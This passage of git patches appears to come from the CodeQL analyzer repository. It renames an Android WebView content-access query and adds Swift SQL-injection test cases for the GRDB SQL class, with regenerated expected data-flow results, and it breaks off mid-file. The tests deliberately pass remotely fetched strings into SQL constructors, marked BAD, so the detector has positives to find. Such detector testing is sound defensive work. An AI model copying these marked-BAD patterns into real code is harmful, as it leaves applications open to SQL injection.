setAllowContentAccess(...) | Sensitive information may be exposed via a malicious link due to access to content:// links being allowed in this WebView. | +| WebViewContentAccess.java:38:9:38:55 | setAllowContentAccess(...) | Sensitive information may be exposed via a malicious link due to access to content:// links being allowed in this WebView. | +| WebViewContentAccess.java:41:25:41:49 | (...)... | Sensitive information may be exposed via a malicious link due to access to content:// links being allowed in this WebView. | +| WebViewContentAccess.java:43:9:43:44 | setAllowContentAccess(...) | Sensitive information may be exposed via a malicious link due to access to content:// links being allowed in this WebView. | +| WebViewContentAccess.java:46:25:46:41 | new WebView(...) | Sensitive information may be exposed via a malicious link due to access to content:// links being allowed in this WebView. | +| WebViewContentAccess.java:48:9:48:44 | setAllowContentAccess(...) | Sensitive information may be exposed via a malicious link due to access to content:// links being allowed in this WebView. | +| WebViewContentAccess.java:51:25:51:44 | getAWebView(...) | Sensitive information may be exposed via a malicious link due to access to content:// links being allowed in this WebView. | +| WebViewContentAccess.java:53:9:53:44 | setAllowContentAccess(...) | Sensitive information may be exposed via a malicious link due to access to content:// links being allowed in this WebView. | +| WebViewContentAccess.java:55:29:55:48 | getAWebView(...) | Sensitive information may be exposed via a malicious link due to access to content:// links being allowed in this WebView. | +| WebViewContentAccess.java:57:25:57:44 | getAWebView(...) | Sensitive information may be exposed via a malicious link due to access to content:// links being allowed in this WebView. | From 909b1d70d92de02e644df3fd14bc9d9ac26dfaaa Mon Sep 17 00:00:00 2001 From: Ed Minnix Date: Mon, 9 Jan 2023 10:11:03 -0500 Subject: [PATCH 135/381] Rename files to say "Allow" instead of "Permit" --- ...ss.qhelp => AndroidWebViewSettingsAllowsContentAccess.qhelp} | 0 ...ntAccess.ql => AndroidWebViewSettingsAllowsContentAccess.ql} | 0 .../security/CWE-200/semmle/tests/WebViewContentAccess.qlref | 2 +- 3 files changed, 1 insertion(+), 1 deletion(-) rename java/ql/src/Security/CWE/CWE-200/{AndroidWebViewSettingsPermitsContentAccess.qhelp => AndroidWebViewSettingsAllowsContentAccess.qhelp} (100%) rename java/ql/src/Security/CWE/CWE-200/{AndroidWebViewSettingsPermitsContentAccess.ql => AndroidWebViewSettingsAllowsContentAccess.ql} (100%) diff --git a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.qhelp b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsAllowsContentAccess.qhelp similarity index 100% rename from java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.qhelp rename to java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsAllowsContentAccess.qhelp diff --git a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsAllowsContentAccess.ql similarity index 100% rename from java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql rename to java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsAllowsContentAccess.ql diff --git a/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.qlref b/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.qlref index 8ea25a487de..7c9eba28b6e 100644 --- a/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.qlref +++ b/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.qlref @@ -1 +1 @@ -Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql \ No newline at end of file +Security/CWE/CWE-200/AndroidWebViewSettingsAllowsContentAccess.ql \ No newline at end of file From eb78661c1f3b022f6c5eaa26df860ac6a5b7bdce Mon Sep 17 00:00:00 2001 From: Tony Torralba Date: Mon, 9 Jan 2023 17:36:54 +0100 Subject: [PATCH 136/381] Add missing SQL injection tests for the GRDB SQL class --- .../query-tests/Security/CWE-089/GRDB.swift | 21 + .../Security/CWE-089/SqlInjection.expected | 373 +++++++++--------- 2 files changed, 217 insertions(+), 177 deletions(-) diff --git a/swift/ql/test/query-tests/Security/CWE-089/GRDB.swift b/swift/ql/test/query-tests/Security/CWE-089/GRDB.swift index a680176bf89..b0319c84eb5 100644 --- a/swift/ql/test/query-tests/Security/CWE-089/GRDB.swift +++ b/swift/ql/test/query-tests/Security/CWE-089/GRDB.swift @@ -159,6 +159,27 @@ func testSqlRequest() throws { let _ = SQLRequest(sql: localString, cached: false) // GOOD } +func testSql() throws { + let localString = "user" + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + + let _ = SQL(stringLiteral: remoteString) // BAD + let _ = SQL(unicodeScalarLiteral: remoteString) // BAD + let _ = SQL(extendedGraphemeClusterLiteral: remoteString) // BAD + let _ = SQL(stringInterpolation: remoteString) // BAD + let _ = SQL(sql: remoteString) // BAD + let sql1 = SQL(stringLiteral: "") + sql1.append(sql: remoteString) // BAD + + let _ = SQL(stringLiteral: localString) // GOOD + let _ = SQL(unicodeScalarLiteral: localString) // GOOD + let _ = SQL(extendedGraphemeClusterLiteral: localString) // GOOD + let _ = SQL(stringInterpolation: localString) // GOOD + let _ = SQL(sql: localString) // GOOD + let sql2 = SQL(stringLiteral: "") + sql2.append(sql: localString) // GOOD +} + func test(tableDefinition: TableDefinition) throws { let localString = "user" let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) diff --git a/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected b/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected index bc60c3508ff..a88b40ccccd 100644 --- a/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected +++ b/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected @@ -19,63 +19,69 @@ edges | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) : | GRDB.swift:149:29:149:29 | remoteString | | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) : | GRDB.swift:150:29:150:29 | remoteString | | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) : | GRDB.swift:151:29:151:29 | remoteString | -| GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) : | GRDB.swift:166:33:166:33 | remoteString | -| GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) : | GRDB.swift:169:32:169:32 | remoteString | -| GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) : | GRDB.swift:172:37:172:37 | remoteString | -| GRDB.swift:178:26:178:80 | call to String.init(contentsOf:) : | GRDB.swift:180:36:180:36 | remoteString | -| GRDB.swift:186:26:186:80 | call to String.init(contentsOf:) : | GRDB.swift:188:41:188:41 | remoteString | -| GRDB.swift:186:26:186:80 | call to String.init(contentsOf:) : | GRDB.swift:189:44:189:44 | remoteString | -| GRDB.swift:186:26:186:80 | call to String.init(contentsOf:) : | GRDB.swift:190:47:190:47 | remoteString | -| GRDB.swift:186:26:186:80 | call to String.init(contentsOf:) : | GRDB.swift:191:47:191:47 | remoteString | -| GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) : | GRDB.swift:203:37:203:37 | remoteString | -| GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) : | GRDB.swift:204:37:204:37 | remoteString | -| GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) : | GRDB.swift:208:37:208:37 | remoteString | -| GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) : | GRDB.swift:209:37:209:37 | remoteString | -| GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) : | GRDB.swift:213:36:213:36 | remoteString | -| GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) : | GRDB.swift:214:36:214:36 | remoteString | -| GRDB.swift:221:26:221:80 | call to String.init(contentsOf:) : | GRDB.swift:223:38:223:38 | remoteString | -| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:231:32:231:32 | remoteString | -| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:232:32:232:32 | remoteString | -| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:233:32:233:32 | remoteString | -| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:234:32:234:32 | remoteString | -| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:240:29:240:29 | remoteString | -| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:241:29:241:29 | remoteString | -| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:242:29:242:29 | remoteString | -| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:243:29:243:29 | remoteString | -| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:249:29:249:29 | remoteString | -| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:250:29:250:29 | remoteString | -| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:251:29:251:29 | remoteString | -| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:252:29:252:29 | remoteString | -| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:258:29:258:29 | remoteString | -| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:259:29:259:29 | remoteString | -| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:260:29:260:29 | remoteString | -| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | GRDB.swift:261:29:261:29 | remoteString | -| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:272:53:272:53 | remoteString | -| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:273:53:273:53 | remoteString | -| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:274:53:274:53 | remoteString | -| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:275:53:275:53 | remoteString | -| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:281:50:281:50 | remoteString | -| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:282:50:282:50 | remoteString | -| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:283:50:283:50 | remoteString | -| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:284:50:284:50 | remoteString | -| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:290:50:290:50 | remoteString | -| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:291:50:291:50 | remoteString | -| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:292:50:292:50 | remoteString | -| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:293:50:293:50 | remoteString | -| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:299:50:299:50 | remoteString | -| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:300:50:300:50 | remoteString | -| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:301:50:301:50 | remoteString | -| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | GRDB.swift:302:50:302:50 | remoteString | -| GRDB.swift:311:26:311:80 | call to String.init(contentsOf:) : | GRDB.swift:313:57:313:57 | remoteString | -| GRDB.swift:311:26:311:80 | call to String.init(contentsOf:) : | GRDB.swift:314:57:314:57 | remoteString | -| GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:323:51:323:51 | remoteString | -| GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:324:51:324:51 | remoteString | -| GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:325:66:325:66 | remoteString | -| GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:326:66:326:66 | remoteString | -| GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:327:69:327:69 | remoteString | -| GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:328:84:328:84 | remoteString | -| GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:329:69:329:69 | remoteString | -| GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | GRDB.swift:330:84:330:84 | remoteString | +| GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) : | GRDB.swift:166:32:166:32 | remoteString | +| GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) : | GRDB.swift:167:39:167:39 | remoteString | +| GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) : | GRDB.swift:168:49:168:49 | remoteString | +| GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) : | GRDB.swift:169:38:169:38 | remoteString | +| GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) : | GRDB.swift:170:22:170:22 | remoteString | +| GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) : | GRDB.swift:172:22:172:22 | remoteString | +| GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) : | GRDB.swift:187:33:187:33 | remoteString | +| GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) : | GRDB.swift:190:32:190:32 | remoteString | +| GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) : | GRDB.swift:193:37:193:37 | remoteString | +| GRDB.swift:199:26:199:80 | call to String.init(contentsOf:) : | GRDB.swift:201:36:201:36 | remoteString | +| GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) : | GRDB.swift:209:41:209:41 | remoteString | +| GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) : | GRDB.swift:210:44:210:44 | remoteString | +| GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) : | GRDB.swift:211:47:211:47 | remoteString | +| GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) : | GRDB.swift:212:47:212:47 | remoteString | +| GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) : | GRDB.swift:224:37:224:37 | remoteString | +| GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) : | GRDB.swift:225:37:225:37 | remoteString | +| GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) : | GRDB.swift:229:37:229:37 | remoteString | +| GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) : | GRDB.swift:230:37:230:37 | remoteString | +| GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) : | GRDB.swift:234:36:234:36 | remoteString | +| GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) : | GRDB.swift:235:36:235:36 | remoteString | +| GRDB.swift:242:26:242:80 | call to String.init(contentsOf:) : | GRDB.swift:244:38:244:38 | remoteString | +| GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:252:32:252:32 | remoteString | +| GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:253:32:253:32 | remoteString | +| GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:254:32:254:32 | remoteString | +| GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:255:32:255:32 | remoteString | +| GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:261:29:261:29 | remoteString | +| GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:262:29:262:29 | remoteString | +| GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:263:29:263:29 | remoteString | +| GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:264:29:264:29 | remoteString | +| GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:270:29:270:29 | remoteString | +| GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:271:29:271:29 | remoteString | +| GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:272:29:272:29 | remoteString | +| GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:273:29:273:29 | remoteString | +| GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:279:29:279:29 | remoteString | +| GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:280:29:280:29 | remoteString | +| GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:281:29:281:29 | remoteString | +| GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | GRDB.swift:282:29:282:29 | remoteString | +| GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:293:53:293:53 | remoteString | +| GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:294:53:294:53 | remoteString | +| GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:295:53:295:53 | remoteString | +| GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:296:53:296:53 | remoteString | +| GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:302:50:302:50 | remoteString | +| GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:303:50:303:50 | remoteString | +| GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:304:50:304:50 | remoteString | +| GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:305:50:305:50 | remoteString | +| GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:311:50:311:50 | remoteString | +| GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:312:50:312:50 | remoteString | +| GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:313:50:313:50 | remoteString | +| GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:314:50:314:50 | remoteString | +| GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:320:50:320:50 | remoteString | +| GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:321:50:321:50 | remoteString | +| GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:322:50:322:50 | remoteString | +| GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | GRDB.swift:323:50:323:50 | remoteString | +| GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) : | GRDB.swift:334:57:334:57 | remoteString | +| GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) : | GRDB.swift:335:57:335:57 | remoteString | +| GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) : | GRDB.swift:344:51:344:51 | remoteString | +| GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) : | GRDB.swift:345:51:345:51 | remoteString | +| GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) : | GRDB.swift:346:66:346:66 | remoteString | +| GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) : | GRDB.swift:347:66:347:66 | remoteString | +| GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) : | GRDB.swift:348:69:348:69 | remoteString | +| GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) : | GRDB.swift:349:84:349:84 | remoteString | +| GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) : | GRDB.swift:350:69:350:69 | remoteString | +| GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) : | GRDB.swift:351:84:351:84 | remoteString | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) : | SQLite.swift:73:17:73:17 | unsafeQuery1 | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) : | SQLite.swift:74:17:74:17 | unsafeQuery2 | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) : | SQLite.swift:75:17:75:17 | unsafeQuery3 | @@ -121,71 +127,78 @@ nodes | GRDB.swift:150:29:150:29 | remoteString | semmle.label | remoteString | | GRDB.swift:151:29:151:29 | remoteString | semmle.label | remoteString | | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | -| GRDB.swift:166:33:166:33 | remoteString | semmle.label | remoteString | -| GRDB.swift:169:32:169:32 | remoteString | semmle.label | remoteString | -| GRDB.swift:172:37:172:37 | remoteString | semmle.label | remoteString | -| GRDB.swift:178:26:178:80 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | -| GRDB.swift:180:36:180:36 | remoteString | semmle.label | remoteString | -| GRDB.swift:186:26:186:80 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | -| GRDB.swift:188:41:188:41 | remoteString | semmle.label | remoteString | -| GRDB.swift:189:44:189:44 | remoteString | semmle.label | remoteString | -| GRDB.swift:190:47:190:47 | remoteString | semmle.label | remoteString | -| GRDB.swift:191:47:191:47 | remoteString | semmle.label | remoteString | -| GRDB.swift:201:26:201:80 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | -| GRDB.swift:203:37:203:37 | remoteString | semmle.label | remoteString | -| GRDB.swift:204:37:204:37 | remoteString | semmle.label | remoteString | -| GRDB.swift:208:37:208:37 | remoteString | semmle.label | remoteString | -| GRDB.swift:209:37:209:37 | remoteString | semmle.label | remoteString | -| GRDB.swift:213:36:213:36 | remoteString | semmle.label | remoteString | -| GRDB.swift:214:36:214:36 | remoteString | semmle.label | remoteString | -| GRDB.swift:221:26:221:80 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | -| GRDB.swift:223:38:223:38 | remoteString | semmle.label | remoteString | -| GRDB.swift:229:26:229:80 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | -| GRDB.swift:231:32:231:32 | remoteString | semmle.label | remoteString | -| GRDB.swift:232:32:232:32 | remoteString | semmle.label | remoteString | -| GRDB.swift:233:32:233:32 | remoteString | semmle.label | remoteString | -| GRDB.swift:234:32:234:32 | remoteString | semmle.label | remoteString | -| GRDB.swift:240:29:240:29 | remoteString | semmle.label | remoteString | -| GRDB.swift:241:29:241:29 | remoteString | semmle.label | remoteString | -| GRDB.swift:242:29:242:29 | remoteString | semmle.label | remoteString | -| GRDB.swift:243:29:243:29 | remoteString | semmle.label | remoteString | -| GRDB.swift:249:29:249:29 | remoteString | semmle.label | remoteString | -| GRDB.swift:250:29:250:29 | remoteString | semmle.label | remoteString | -| GRDB.swift:251:29:251:29 | remoteString | semmle.label | remoteString | -| GRDB.swift:252:29:252:29 | remoteString | semmle.label | remoteString | -| GRDB.swift:258:29:258:29 | remoteString | semmle.label | remoteString | -| GRDB.swift:259:29:259:29 | remoteString | semmle.label | remoteString | -| GRDB.swift:260:29:260:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:166:32:166:32 | remoteString | semmle.label | remoteString | +| GRDB.swift:167:39:167:39 | remoteString | semmle.label | remoteString | +| GRDB.swift:168:49:168:49 | remoteString | semmle.label | remoteString | +| GRDB.swift:169:38:169:38 | remoteString | semmle.label | remoteString | +| GRDB.swift:170:22:170:22 | remoteString | semmle.label | remoteString | +| GRDB.swift:172:22:172:22 | remoteString | semmle.label | remoteString | +| GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | +| GRDB.swift:187:33:187:33 | remoteString | semmle.label | remoteString | +| GRDB.swift:190:32:190:32 | remoteString | semmle.label | remoteString | +| GRDB.swift:193:37:193:37 | remoteString | semmle.label | remoteString | +| GRDB.swift:199:26:199:80 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | +| GRDB.swift:201:36:201:36 | remoteString | semmle.label | remoteString | +| GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | +| GRDB.swift:209:41:209:41 | remoteString | semmle.label | remoteString | +| GRDB.swift:210:44:210:44 | remoteString | semmle.label | remoteString | +| GRDB.swift:211:47:211:47 | remoteString | semmle.label | remoteString | +| GRDB.swift:212:47:212:47 | remoteString | semmle.label | remoteString | +| GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | +| GRDB.swift:224:37:224:37 | remoteString | semmle.label | remoteString | +| GRDB.swift:225:37:225:37 | remoteString | semmle.label | remoteString | +| GRDB.swift:229:37:229:37 | remoteString | semmle.label | remoteString | +| GRDB.swift:230:37:230:37 | remoteString | semmle.label | remoteString | +| GRDB.swift:234:36:234:36 | remoteString | semmle.label | remoteString | +| GRDB.swift:235:36:235:36 | remoteString | semmle.label | remoteString | +| GRDB.swift:242:26:242:80 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | +| GRDB.swift:244:38:244:38 | remoteString | semmle.label | remoteString | +| GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | +| GRDB.swift:252:32:252:32 | remoteString | semmle.label | remoteString | +| GRDB.swift:253:32:253:32 | remoteString | semmle.label | remoteString | +| GRDB.swift:254:32:254:32 | remoteString | semmle.label | remoteString | +| GRDB.swift:255:32:255:32 | remoteString | semmle.label | remoteString | | GRDB.swift:261:29:261:29 | remoteString | semmle.label | remoteString | -| GRDB.swift:270:26:270:80 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | -| GRDB.swift:272:53:272:53 | remoteString | semmle.label | remoteString | -| GRDB.swift:273:53:273:53 | remoteString | semmle.label | remoteString | -| GRDB.swift:274:53:274:53 | remoteString | semmle.label | remoteString | -| GRDB.swift:275:53:275:53 | remoteString | semmle.label | remoteString | -| GRDB.swift:281:50:281:50 | remoteString | semmle.label | remoteString | -| GRDB.swift:282:50:282:50 | remoteString | semmle.label | remoteString | -| GRDB.swift:283:50:283:50 | remoteString | semmle.label | remoteString | -| GRDB.swift:284:50:284:50 | remoteString | semmle.label | remoteString | -| GRDB.swift:290:50:290:50 | remoteString | semmle.label | remoteString | -| GRDB.swift:291:50:291:50 | remoteString | semmle.label | remoteString | -| GRDB.swift:292:50:292:50 | remoteString | semmle.label | remoteString | -| GRDB.swift:293:50:293:50 | remoteString | semmle.label | remoteString | -| GRDB.swift:299:50:299:50 | remoteString | semmle.label | remoteString | -| GRDB.swift:300:50:300:50 | remoteString | semmle.label | remoteString | -| GRDB.swift:301:50:301:50 | remoteString | semmle.label | remoteString | +| GRDB.swift:262:29:262:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:263:29:263:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:264:29:264:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:270:29:270:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:271:29:271:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:272:29:272:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:273:29:273:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:279:29:279:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:280:29:280:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:281:29:281:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:282:29:282:29 | remoteString | semmle.label | remoteString | +| GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | +| GRDB.swift:293:53:293:53 | remoteString | semmle.label | remoteString | +| GRDB.swift:294:53:294:53 | remoteString | semmle.label | remoteString | +| GRDB.swift:295:53:295:53 | remoteString | semmle.label | remoteString | +| GRDB.swift:296:53:296:53 | remoteString | semmle.label | remoteString | | GRDB.swift:302:50:302:50 | remoteString | semmle.label | remoteString | -| GRDB.swift:311:26:311:80 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | -| GRDB.swift:313:57:313:57 | remoteString | semmle.label | remoteString | -| GRDB.swift:314:57:314:57 | remoteString | semmle.label | remoteString | -| GRDB.swift:321:26:321:80 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | -| GRDB.swift:323:51:323:51 | remoteString | semmle.label | remoteString | -| GRDB.swift:324:51:324:51 | remoteString | semmle.label | remoteString | -| GRDB.swift:325:66:325:66 | remoteString | semmle.label | remoteString | -| GRDB.swift:326:66:326:66 | remoteString | semmle.label | remoteString | -| GRDB.swift:327:69:327:69 | remoteString | semmle.label | remoteString | -| GRDB.swift:328:84:328:84 | remoteString | semmle.label | remoteString | -| GRDB.swift:329:69:329:69 | remoteString | semmle.label | remoteString | -| GRDB.swift:330:84:330:84 | remoteString | semmle.label | remoteString | +| GRDB.swift:303:50:303:50 | remoteString | semmle.label | remoteString | +| GRDB.swift:304:50:304:50 | remoteString | semmle.label | remoteString | +| GRDB.swift:305:50:305:50 | remoteString | semmle.label | remoteString | +| GRDB.swift:311:50:311:50 | remoteString | semmle.label | remoteString | +| GRDB.swift:312:50:312:50 | remoteString | semmle.label | remoteString | +| GRDB.swift:313:50:313:50 | remoteString | semmle.label | remoteString | +| GRDB.swift:314:50:314:50 | remoteString | semmle.label | remoteString | +| GRDB.swift:320:50:320:50 | remoteString | semmle.label | remoteString | +| GRDB.swift:321:50:321:50 | remoteString | semmle.label | remoteString | +| GRDB.swift:322:50:322:50 | remoteString | semmle.label | remoteString | +| GRDB.swift:323:50:323:50 | remoteString | semmle.label | remoteString | +| GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | +| GRDB.swift:334:57:334:57 | remoteString | semmle.label | remoteString | +| GRDB.swift:335:57:335:57 | remoteString | semmle.label | remoteString | +| GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | +| GRDB.swift:344:51:344:51 | remoteString | semmle.label | remoteString | +| GRDB.swift:345:51:345:51 | remoteString | semmle.label | remoteString | +| GRDB.swift:346:66:346:66 | remoteString | semmle.label | remoteString | +| GRDB.swift:347:66:347:66 | remoteString | semmle.label | remoteString | +| GRDB.swift:348:69:348:69 | 